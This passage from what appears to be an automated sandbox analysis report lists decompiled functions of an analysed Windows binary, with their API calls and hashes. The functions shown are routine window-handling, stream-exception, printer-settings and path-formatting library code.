                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
                  • String ID: d"E$d"E
                  • API String ID: 569107404-4184370214
                  • Opcode ID: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction ID: 524c0d43197d56bd0e71cd9908d075d591d8cf06ddb31c5e0e4a1a423c794921
                  • Opcode Fuzzy Hash: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction Fuzzy Hash: AC61A4309002199BDB11EFA5CC45BEEBBF4AF04314F14429FE815A72A2DB78DAC5CB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416F97, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00416F97(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v268;
				struct HWND__* _v272;
				signed int _v276;
				long _v280;
				struct HWND__* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t53;
				intOrPtr _t56;
				long _t59;
				struct HWND__* _t62;
				CHAR* _t63;
				void* _t64;
				void* _t66;
				void* _t70;
				void* _t71;
				long _t72;
				void* _t73;
				void* _t74;
				signed int _t76;
				void* _t77;
				signed int _t81;

				_t70 = __edx;
				_t79 = _t81;
				_t36 =  *0x463404; // 0x18eab29f
				_v8 = _t36 ^ _t81;
				_t72 = _a4;
				_t76 = 0;
				_v288 = _a8;
				E00416EAC(0);
				_t66 = _t71;
				_t62 = E00416EE5(0,  &_v272);
				_v284 = _t62;
				if(_t62 != _v272) {
					EnableWindow(_t62, 1);
				}
				_v280 = _v280 & _t76;
				GetWindowThreadProcessId(_t62,  &_v280);
				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
					L7:
					__eflags = _t72;
					if(__eflags != 0) {
						_t76 = _t72 + 0x78;
					}
					goto L9;
				} else {
					_t59 = SendMessageA(_t62, 0x376, 0, 0);
					if(_t59 == 0) {
						goto L7;
					} else {
						_t76 = _t59;
						L9:
						_v276 = _v276 & 0x00000000;
						if(_t76 != 0) {
							_v276 =  *_t76;
							_t56 = _a16;
							if(_t56 != 0) {
								 *_t76 = _t56 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t53 = _a12 & 0x0000000f;
							if(_t53 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t53 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						_t96 = _t72;
						if(_t72 == 0) {
							_t63 =  &_v268;
							_t72 = 0x104;
							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
							if(__eflags == 0) {
								_v9 = 0;
							}
						} else {
							_t63 =  *(_t72 + 0x50);
						}
						_push(_a12);
						_push(_t63);
						_push(_v288);
						_push(_v284);
						_t73 = E0040D53F(_t63, _t66, _t72, _t76, _t96);
						if(_t76 != 0) {
							 *_t76 = _v276;
						}
						if(_v272 != 0) {
							EnableWindow(_v272, 1);
						}
						E00416EAC(1);
						_pop(_t74);
						_pop(_t77);
						_pop(_t64);
						return E00430650(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
					}
				}
			}































                  0x00416f97
                  0x00416f9a
                  0x00416fa2
                  0x00416fa9
                  0x00416fb2
                  0x00416fb5
                  0x00416fb8
                  0x00416fbe
                  0x00416fc3
                  0x00416fd1
                  0x00416fd3
                  0x00416fdf
                  0x00416fe4
                  0x00416fe4
                  0x00416fea
                  0x00416ff8
                  0x00417000
                  0x00417028
                  0x00417028
                  0x0041702a
                  0x0041702c
                  0x0041702c
                  0x00000000
                  0x00417010
                  0x0041701a
                  0x00417022
                  0x00000000
                  0x00417024
                  0x00417024
                  0x0041702f
                  0x0041702f
                  0x00417038
                  0x0041703c
                  0x00417042
                  0x00417047
                  0x0041704e
                  0x0041704e
                  0x00417047
                  0x00417054
                  0x00417059
                  0x0041705f
                  0x0041706f
                  0x0041706f
                  0x0041706f
                  0x00417061
                  0x00417067
                  0x00417069
                  0x00417069
                  0x00417067
                  0x0041705f
                  0x00417073
                  0x0041707a
                  0x0041707c
                  0x00417083
                  0x00417089
                  0x0041709a
                  0x0041709c
                  0x0041709e
                  0x0041709e
                  0x0041707e
                  0x0041707e
                  0x0041707e
                  0x004170a2
                  0x004170a5
                  0x004170a6
                  0x004170ac
                  0x004170ba
                  0x004170be
                  0x004170c6
                  0x004170c6
                  0x004170cf
                  0x004170d9
                  0x004170d9
                  0x004170e1
                  0x004170ec
                  0x004170ed
                  0x004170f0
                  0x004170f7
                  0x004170f7
                  0x00417022

                  APIs
                    • Part of subcall function 00416EE5: GetParent.USER32(?), ref: 00416F39
                    • Part of subcall function 00416EE5: GetLastActivePopup.USER32(?), ref: 00416F4A
                    • Part of subcall function 00416EE5: IsWindowEnabled.USER32(?), ref: 00416F5E
                    • Part of subcall function 00416EE5: EnableWindow.USER32(?,00000000), ref: 00416F71
                  • EnableWindow.USER32(?,00000001), ref: 00416FE4
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416FF8
                  • GetCurrentProcessId.KERNEL32(?,?), ref: 00417002
                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041701A
                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 00417094
                  • EnableWindow.USER32(00000000,00000001), ref: 004170D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                  • String ID: 0
                  • API String ID: 1877664794-4108050209
                  • Opcode ID: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction ID: b4bc687f8c3733e7692b145a2cdb5596cc84dfbc90c2c000e693f98fe407a247
                  • Opcode Fuzzy Hash: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction Fuzzy Hash: 9C41D432A043189BDB218F25CC42BDABBB4FB59710F1405AAF555A7280D7B5DEC08F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402D20, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00402D20(void* __ecx, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v40;
				char _v44;
				void* _v84;
				char _v88;
				char _v108;
				char _v112;
				void* _v152;
				char _v156;
				signed int _t30;
				signed int _t34;
				signed char _t48;
				void* _t60;

				_push(0xffffffff);
				_push(E0044A998);
				_push( *[fs:0x0]);
				_t30 =  *0x463404; // 0x18eab29f
				_push(_t30 ^ _t60 - 0x00000088);
				 *[fs:0x0] =  &_v12;
				_t34 = _a4 & 0x00000017;
				 *(__ecx + 8) = _t34;
				_t48 =  *(__ecx + 0xc) & _t34;
				if(_t48 != 0) {
					if(_a8 != 0) {
						E00430CF4(0, 0);
					}
					_t65 = _t48 & 0x00000004;
					if((_t48 & 0x00000004) != 0) {
						E00402CE0( &_v108, "ios_base::badbit set");
						_v8 = 0;
						E00402BA0(_t65,  &_v112);
						_t48 =  &_v156;
						_v156 = 0x44f0a8;
						E00430CF4(_t48, 0x45ad90);
					}
					_t66 = _t48 & 0x00000002;
					if((_t48 & 0x00000002) != 0) {
						E00402CE0( &_v108, "ios_base::failbit set");
						_v8 = 1;
						E00402BA0(_t66,  &_v112);
						_v156 = 0x44f0a8;
						E00430CF4( &_v156, 0x45ad90);
					}
					E00402CE0( &_v40, "ios_base::eofbit set");
					_v8 = 2;
					E00402BA0(_t66,  &_v44);
					_v88 = 0x44f0a8;
					_t34 = E00430CF4( &_v88, 0x45ad90);
				}
				 *[fs:0x0] = _v12;
				return _t34;
			}

















                  0x00402d20
                  0x00402d22
                  0x00402d2d
                  0x00402d34
                  0x00402d3b
                  0x00402d43
                  0x00402d50
                  0x00402d53
                  0x00402d59
                  0x00402d5b
                  0x00402d69
                  0x00402d6f
                  0x00402d6f
                  0x00402d74
                  0x00402d77
                  0x00402d82
                  0x00402d90
                  0x00402d9b
                  0x00402da5
                  0x00402daa
                  0x00402db2
                  0x00402db2
                  0x00402db7
                  0x00402dba
                  0x00402dc5
                  0x00402dd3
                  0x00402dde
                  0x00402ded
                  0x00402df5
                  0x00402df5
                  0x00402e03
                  0x00402e11
                  0x00402e1c
                  0x00402e2b
                  0x00402e33
                  0x00402e33
                  0x00402e3f
                  0x00402e4d

                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00402D6F
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • __CxxThrowException@8.LIBCMT ref: 00402DB2
                  • __CxxThrowException@8.LIBCMT ref: 00402DF5
                  • __CxxThrowException@8.LIBCMT ref: 00402E33
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 3476068407-1866435925
                  • Opcode ID: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction ID: 6733c9bcb70d95c348e19533369f8285caa6829711c6102e50207661ceb21adc
                  • Opcode Fuzzy Hash: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction Fuzzy Hash: 20219371058340AED365DB14C956F9EB7E4BF84704F508A2EF489522C2DBBC940CCB2B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004042A0, Relevance: 12.1, APIs: 8, Instructions: 94windowsynchronizationsleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E004042A0(void* __ecx) {
				void* __ebx;
				void* _t23;
				void* _t37;
				void* _t38;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;
				void* _t54;

				_t23 = E0040EE3C(_t37, __ecx,  *((intOrPtr*)(_t54 + 0x18)));
				_t51 =  *((intOrPtr*)(_t54 + 0x20));
				_t38 = _t23;
				do {
					_t53 = 0;
					_t3 = _t53 + 5; // 0x5
					_t52 = _t3;
					do {
						if(_t51 == 0) {
							L6:
							if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
								_push(0);
								_push(_t52);
								_push(0x401);
								if(_t51 != 0) {
									PostMessageA( *(_t38 + 0x20), ??, ??, ??);
								} else {
									SendMessageA( *(_t38 + 0x20), ??, ??, ??);
								}
							}
							Sleep( *(_t54 + 0x24) * 0x32);
							goto L11;
						} else {
							if(WaitForSingleObject( *(_t51 + 0x18), 0) == 0) {
								if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
									PostMessageA( *(_t38 + 0x20), 0x401, 0, 0);
								}
								return 0;
							} else {
								if(WaitForSingleObject( *(_t51 + 0x10), 0) != 0) {
									goto L6;
								} else {
									 *((intOrPtr*)(_t54 + 0x14)) =  *_t51;
									 *((intOrPtr*)(_t54 + 0x18)) =  *((intOrPtr*)(_t51 + 4));
									_t53 = 1;
								}
								goto L11;
							}
						}
						L21:
						L11:
						_t52 = _t52 + 5;
					} while (_t52 < 0x64);
					if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
						_push(0);
						_push(0x64);
						_push(0x401);
						if(_t51 != 0) {
							PostMessageA( *(_t38 + 0x20), ??, ??, ??);
						} else {
							SendMessageA( *(_t38 + 0x20), ??, ??, ??);
						}
					}
				} while (_t53 != 0);
				_t19 = _t53 + 1; // 0x1
				 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x1c)))) =  *((intOrPtr*)(_t54 + 0x14)) +  *((intOrPtr*)(_t54 + 0x18));
				return _t19;
				goto L21;
			}











                  0x004042a9
                  0x004042ae
                  0x004042b2
                  0x004042b4
                  0x004042b4
                  0x004042b6
                  0x004042b6
                  0x004042c0
                  0x004042c2
                  0x004042fc
                  0x00404301
                  0x00404303
                  0x00404305
                  0x00404306
                  0x0040430d
                  0x0040431f
                  0x0040430f
                  0x00404313
                  0x00404313
                  0x0040430d
                  0x0040432d
                  0x00000000
                  0x004042c4
                  0x004042d2
                  0x0040438a
                  0x00404399
                  0x00404399
                  0x004043a5
                  0x004042d8
                  0x004042e6
                  0x00000000
                  0x004042e8
                  0x004042ed
                  0x004042f1
                  0x004042f5
                  0x004042f5
                  0x00000000
                  0x004042e6
                  0x004042d2
                  0x00000000
                  0x00404333
                  0x00404333
                  0x00404336
                  0x00404340
                  0x00404342
                  0x00404344
                  0x00404346
                  0x0040434d
                  0x0040435f
                  0x0040434f
                  0x00404353
                  0x00404353
                  0x0040434d
                  0x00404365
                  0x0040437d
                  0x00404381
                  0x00404384
                  0x00000000

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                  • SendMessageA.USER32(?,00000401,00000005,00000000), ref: 00404313
                  • PostMessageA.USER32 ref: 0040431F
                  • Sleep.KERNEL32(?,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 0040432D
                  • SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • PostMessageA.USER32 ref: 0040435F
                  • PostMessageA.USER32 ref: 00404399
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Post$ObjectSendSingleWait$Sleep
                  • String ID:
                  • API String ID: 2464283338-0
                  • Opcode ID: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction ID: e8d374fd60e575347347b4847cbe04a4b6a9ea2e9a853ff6579190935c6ace5b
                  • Opcode Fuzzy Hash: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction Fuzzy Hash: 8B31AAB5304300ABD720CF61D888B6B77A4FBC8740F21492EFA45AB2D0C774E801CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414F48, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00414F48(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E0041FD19(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0041FD19( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                  0x00414f4d
                  0x00414f4f
                  0x00414f51
                  0x00414f59
                  0x00414f73
                  0x00414f7b
                  0x00414f85
                  0x00414f8c
                  0x00414f8e
                  0x00414f93
                  0x00414f96
                  0x00414f96
                  0x00414fad
                  0x00414fb4
                  0x00414fcc
                  0x00414fd1
                  0x00414fd6
                  0x00414fd6
                  0x00414fdc
                  0x00414fdc
                  0x00414f8c
                  0x00414fe1
                  0x00414fe5

                  APIs
                  • GlobalLock.KERNEL32 ref: 00414F67
                  • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,00410705,?), ref: 00414F73
                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414F85
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,00410705,?), ref: 00414FA5
                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00414FAD
                  • GlobalLock.KERNEL32 ref: 00414FB7
                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FC4
                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705,?), ref: 00414FDC
                    • Part of subcall function 0041FD19: GlobalFlags.KERNEL32(?), ref: 0041FD28
                    • Part of subcall function 0041FD19: GlobalUnlock.KERNEL32(?,?,00414FD6,?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,00410705), ref: 0041FD3A
                    • Part of subcall function 0041FD19: GlobalFree.KERNEL32 ref: 0041FD45
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                  • String ID:
                  • API String ID: 168474834-0
                  • Opcode ID: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction ID: 948f0dece0448d59d7c1233082a5740d041519e2e2aed2f4fe9fb02b6f449665
                  • Opcode Fuzzy Hash: cdcf3c773ee7cde1bfdb72fb011224be38b68d7d2977b445d10daf31d4604e9f
                  • Instruction Fuzzy Hash: 5811CE79600604BBDB229BB6DC49CBF7EEDFBC5704710042AFA06D2221D739CA42D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040E9F9, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040E9F9(intOrPtr* __ecx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t70 = __ecx;
				_t74 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t74 + 0x20));
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
					_v24 = _t48;
					_t49 = E00415AE2(_t76);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t77 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E00416049(_t70, 0, _t74, _t77);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E00412C34(_t74, 1);
									UpdateWindow( *(_t74 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t74;
							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
							_t82 = _t54;
							if(_t54 == 0) {
								_t45 = _t74 + 0x3c;
								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t74 + 0x44));
							} else {
								_push(_v20);
								_t56 = E00415EC6(_t69, _t71, 0, _t74, _t82);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t77 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E00414E3D();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t74;
								E00412C34(_t74, 1);
								UpdateWindow( *(_t74 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E00412B38(__ecx);
				_v8 = 1;
				_t76 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}























                  0x0040e9f9
                  0x0040ea0d
                  0x0040ea0f
                  0x0040ea12
                  0x0040ea15
                  0x0040ea26
                  0x0040ea26
                  0x0040ea29
                  0x0040ea2c
                  0x0040ea32
                  0x0040ea36
                  0x0040ea39
                  0x0040ea3e
                  0x0040ea44
                  0x0040eab4
                  0x0040eab4
                  0x0040eab7
                  0x00000000
                  0x00000000
                  0x0040eab9
                  0x0040eab9
                  0x0040eab9
                  0x0040eac0
                  0x00000000
                  0x00000000
                  0x0040eac5
                  0x0040eaca
                  0x0040ead2
                  0x0040eadf
                  0x0040eae7
                  0x0040eae9
                  0x0040eae9
                  0x0040ead2
                  0x0040eaee
                  0x0040eaf0
                  0x0040eaf6
                  0x0040eaf8
                  0x0040eb2f
                  0x0040eb2f
                  0x0040eb2f
                  0x00000000
                  0x0040eafa
                  0x0040eafa
                  0x0040eafd
                  0x0040eb02
                  0x0040eb05
                  0x0040eb07
                  0x0040eb0e
                  0x0040eb0e
                  0x0040eb20
                  0x0040eab4
                  0x0040eab4
                  0x0040eab7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040eab7
                  0x0040eab4
                  0x00000000
                  0x0040eb20
                  0x0040eaf8
                  0x0040eb24
                  0x0040eb25
                  0x00000000
                  0x0040ea49
                  0x0040ea56
                  0x0040ea58
                  0x00000000
                  0x0040ea5a
                  0x0040ea5a
                  0x0040ea5d
                  0x0040ea61
                  0x0040ea63
                  0x0040ea6b
                  0x0040ea6d
                  0x0040ea6d
                  0x0040ea70
                  0x0040ea74
                  0x0040ea76
                  0x0040ea79
                  0x0040ea7b
                  0x0040ea7e
                  0x0040ea8c
                  0x0040ea8c
                  0x0040ea7e
                  0x0040ea79
                  0x0040ea92
                  0x0040ea96
                  0x0040eab1
                  0x0040eab1
                  0x00000000
                  0x0040ea98
                  0x0040eaa4
                  0x0040eaaa
                  0x0040eaad
                  0x0040eaaf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040eaaf
                  0x0040ea96
                  0x0040ea58
                  0x0040eab4
                  0x0040ea17
                  0x0040ea1c
                  0x0040ea1f
                  0x0040ea24
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetParent.USER32(?), ref: 0040EA2C
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA50
                  • UpdateWindow.USER32(?), ref: 0040EA6B
                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 0040EA8C
                  • SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 0040EAA4
                  • UpdateWindow.USER32(?), ref: 0040EAE7
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EB18
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$PeekSendUpdate$LongParent
                  • String ID:
                  • API String ID: 2853195852-0
                  • Opcode ID: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction ID: 9cec2da762fcf1ae17ec792ded61e67ab4686bf0a0b4de212a99b23e2336cc78
                  • Opcode Fuzzy Hash: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction Fuzzy Hash: C5418D30A00245ABCB21DFA7C944AAFBFB4FF85704F10892EE541B22E1D7799950CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004268B6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E004268B6(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t32;
				void* _t34;
				intOrPtr _t35;
				char* _t36;
				int _t38;
				CHAR* _t40;
				CHAR* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t62;
				CHAR* _t64;
				void* _t66;
				int _t67;
				intOrPtr _t68;

				_t62 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(_t49);
				_push(_t66);
				_t64 = _a4;
				_push(0xffffffff);
				_t32 = E00424A91(_t64);
				_t76 = _t32;
				if(_t32 == 0) {
					E00406436(_t49, __ecx, _t64, _t66, _t76);
				}
				_t67 = lstrlenA(_t64);
				_v8 = _t67;
				_t34 = E0042FDDC(_t64, 0, 0);
				_t57 = _v8;
				_t51 = _t34 - 1;
				_t68 = _t67 - _t51;
				_t35 = _t68 + _t64;
				_v12 = _t35;
				if(_a8 < _t57) {
					if(_a8 >= _t51) {
						__eflags =  *_t64 - 0x5c;
						_t36 =  &(_t64[2]);
						_a4 = _t36;
						if( *_t64 == 0x5c) {
							__eflags = _t64[1] - 0x5c;
							if(_t64[1] == 0x5c) {
								while(1) {
									__eflags =  *_t36 - 0x5c;
									if( *_t36 == 0x5c) {
										goto L13;
									}
									_t36 = E004348EB(_t62, _t64, _a4);
									_a4 = _t36;
								}
							}
						}
						L13:
						__eflags = _t68 - 3;
						if(_t68 > 3) {
							do {
								_t47 = E004348EB(_t62, _t64, _a4);
								__eflags =  *_t47 - 0x5c;
								_a4 = _t47;
							} while ( *_t47 != 0x5c);
						}
						_t68 = _a4 - _t64;
						__eflags = _a8 - _t68 + _t51 + 5;
						if(_a8 >= _t68 + _t51 + 5) {
							while(1) {
								_t38 = lstrlenA(_a4);
								__eflags = _t38 + _t68 + 4 - _a8;
								if(_t38 + _t68 + 4 > _a8) {
									goto L18;
								} else {
									break;
								}
